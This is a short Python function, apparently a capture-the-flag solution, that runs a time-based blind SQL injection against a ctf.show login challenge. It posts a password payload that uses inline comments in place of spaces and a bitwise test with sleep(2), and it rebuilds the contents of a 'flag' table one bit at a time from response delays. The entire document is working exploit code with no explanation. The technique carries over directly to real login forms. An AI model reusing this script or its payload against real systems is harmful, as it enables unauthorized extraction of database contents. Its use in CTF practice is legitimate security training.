def and_operation(): url = "http://dceb0f35-65a5-4f40-856e-ecdc2d487f30.challenge.ctf.show:8080/" flag_payload = "1'/**/or/**/if((ascii(substr((select/**/flag/**/from/**/flag),{0},1))&{1}),sleep(2),1)/**/#" info = "" for j in range(1, 100): value = 0 for k in range(7): payload = flag_payload.format(j, 2 ** k) data = { "username": "admin", "password": payload } start_time=time.time() res = requests.post(url=url, data=data) end_time=time.time() spend_time=end_time-start_time if spend_time>2: value = value + (2 ** k) if value == 0: break info = info + chr(value) print(info)